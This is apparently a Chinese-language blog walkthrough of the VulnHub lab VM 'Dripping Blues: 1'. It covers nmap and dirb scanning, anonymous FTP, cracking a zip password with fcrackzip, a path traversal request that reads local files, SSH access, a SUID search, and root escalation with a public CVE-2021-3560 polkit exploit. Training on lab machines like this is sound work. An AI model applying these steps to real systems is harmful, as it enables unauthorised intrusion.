vulnhub刷題記錄(Dripping Blues: 1)

語言: CN / TW / HK
  • 英文名稱 :Dripping Blues: 1
  • 中文名稱 :滴水藍調:1
  • 釋出日期 :2021 年 9 月 19 日
  • 難度 :容易
  • 描述 :關於 vm:測試並從 virtualbox 匯出。啟用 dhcp 和巢狀 vtx/amdv。您可以通過電子郵件與我聯絡以獲取故障排除或問題。
  • 下載地址https://www.vulnhub.com/entry/empire-breakout,751/

1、主機發現,IP地址為192.168.199.242

nmap -sP 192.168.199.0/24   
Nmap scan report for drippingblues.lan (192.168.199.242)
主機發現

2、埠掃描,發現了21、22、80埠

nmap -A 192.168.199.242
埠掃描

3、web訪問

web首頁

4、目錄爆破,發現線索

└─$ dirb http://192.168.199.242/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 21 14:51:29 2022
URL_BASE: http://192.168.199.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.199.242/ ----
+ http://192.168.199.242/index.php (CODE:200|SIZE:138)                                                                                
+ http://192.168.199.242/robots.txt (CODE:200|SIZE:78)                                                                                
+ http://192.168.199.242/server-status (CODE:403|SIZE:280)                                                                            
                                                                                                                                      
-----------------
END_TIME: Sun Aug 21 14:51:34 2022
DOWNLOADED: 4612 - FOUND: 3
目錄爆破

5、線索提示,去計算ssh的密碼

ssh線索提示

6、挖掘21埠資訊,可以匿名登入,發現 respectmydrip.zip 檔案 ,下載之後,發現需要密碼才能開啟

ftp匿名登入

7、嘗試對檔案進行密碼破解,這裡使用134M的密碼本

rockyou.txt密碼本

8、啟動暴力破解

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

PASSWORD FOUND!!!!: pw == 072528035
暴力破解密碼

9、使用密碼,解開壓縮包檔案,得到一個提示和另一個加密壓縮

just focus on "drip"
得到提示和另一個加密壓縮包

10、嘗試web訪問,得到密碼 imdrippinbiatch

http://192.168.199.242/index.php?drip=../../../../etc/dripispowerful.html
得到線索

11、根據登入頁面提示,使用者名稱是thugger

得到使用者名稱

12、ssh登入,拿到普通使用者的flag

ssh登入成功
普通使用者flag

13、尋找提權點,可疑點 /usr/lib/policykit-1/polkit-agent-helper-1

thugger@drippingblues:~$ find / -perm -u=s 2>&1 | grep -v "Permission denied"
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
存在polkit程序

14、利用polkid提權漏洞

CVE-2021-3560 是對 polkit 的一種身份驗證繞過,它允許非特權使用者使用 DBus 呼叫特權方法,在這個漏洞中我們將呼叫 accountservice 提供的 2 個特權方法(CreateUser 和 SetPassword),這允許我們建立一個特權使用者然後為其設定密碼,最後以建立的使用者身份登入,然後提升為root。

15、scp上傳poc指令碼

上傳poc指令碼

16、執行指令碼,成功拿到root許可權,獲得flag

thugger@drippingblues:~$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit 
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
........
獲得root許可權

到此,實驗完成~

參考

  1. Polkit-exploit   https://github.com/Almorabea/Polkit-exploit